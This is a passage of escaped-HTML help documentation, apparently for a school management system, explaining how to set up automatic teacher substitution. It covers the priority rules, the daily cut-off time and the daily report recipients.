There\u2019s a list of rules, set in a priority order, which are provided based on which teachers are substituted. The following are the criteria.<br \/>\n<\/span><\/p>\n<ul>\n<li><span style=\"font-weight: 400;\">Substitute <\/span><b>any free subject teacher<\/b><span style=\"font-weight: 400;\">,\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Substitute teacher of <\/span><b>different subjects of the same class<\/b><span style=\"font-weight: 400;\">,\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Substitute <\/span><b>any free teacher<\/b><span style=\"font-weight: 400;\">,\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Substitute teacher of the <\/span><b>same subject of the same class<\/b><span style=\"font-weight: 400;\">,\u00a0<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Substitute teacher of the <b>same subject of a different class<\/b>.<br \/>\n<\/span><\/li>\n<\/ul>\n<p><b>By default, the setting is set to Manual<\/b><span style=\"font-weight: 400;\">. Hence, in order to substitute teachers, the user should manually select the teachers to substitute the absentee or the unavailable teacher of the day from\u00a0 <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-90\" src=\"https:\/\/helpcenter.nexterp.in\/helpcenter\/wp-content\/uploads\/2019\/06\/Menu.png\" alt=\"\" width=\"20\" height=\"14\" \/> <\/span><span style=\"font-weight: 400;\"> &gt; Timetable &gt; Timetable Dashboard &gt; Substitutions.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The substitution can be set to Automatic to get rid of the manual work of substituting each teacher everytime.<\/span><\/p>\n<ol>\n<li><span style=\"font-weight: 400;\">Click <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1585\" src=\"https:\/\/helpcenter.nexterp.in\/helpcenter\/wp-content\/uploads\/2019\/10\/22.png\" alt=\"\" width=\"28\" height=\"30\" \/><\/span><span style=\"font-weight: 400;\">to edit the teacher substitution settings.<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Select checkcircle against <\/span><b>Automatic<\/b><span style=\"font-weight: 400;\"> as the substitution type.<br \/>\nThe user can still manually select the teacher for substitution.<br \/>\n<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Set the <\/span><b>daily cut off<\/b><span style=\"font-weight: 400;\"> time by clicking on this icon <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2287\" src=\"https:\/\/helpcenter.nexterp.in\/helpcenter\/wp-content\/uploads\/2019\/11\/61.png\" alt=\"\" width=\"23\" height=\"27\" \/><\/span><span style=\"font-weight: 400;\"> at which the teacher substitution should happen automatically based on the staff attendance recorded till this time either by providing biometric attendance or by manually marking attendance. Applied leaves before this time will also be taken into consideration when the substitution has happened.<br \/>\n<\/span><span style=\"text-decoration: underline;\"><strong>NOTE<\/strong><\/span>:<br \/>\n<span style=\"font-weight: 400;\">The attendance after this time will never be considered for the substitution. In such a case, the user has to manually substitute the teacher.<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Select the priority order of the substitution for the automatic substitution.<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\">The teacher under the top rule will substitute the absent and on-leave teacher. If no teacher falls under rule 1, a teacher under rule 2 will be considered, and if no teacher falls under rule 2 then, rule 3 teachers and similarly it goes on.<br \/>\n<span style=\"text-decoration: underline;\"><strong>NOTE<\/strong><\/span>:<br \/>\nThe automatic substitution will ignore the teachers who have already been substituted today.<br \/>\n<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Select the <\/span><b>daily report time<\/b><span style=\"font-weight: 400;\"> at which the selected recipients will get the teacher substitution report to inform the recipients which teachers were substituted by which teachers.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Click <\/span><b>ADD STAFF<\/b><span style=\"font-weight: 400;\"> to select the recipients. The pop-up window will appear.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Search the name of the teacher or select a <\/span><b>Department<\/b><span style=\"font-weight: 400;\"> from the drop-down menu which is set to <\/span><b>All<\/b><span style=\"font-weight: 400;\"> departments by default. The list of the teachers will appear.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Select check circle against the teacher\u2019s name.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Click <\/span><b>ADD<\/b><span style=\"font-weight: 400;\">.
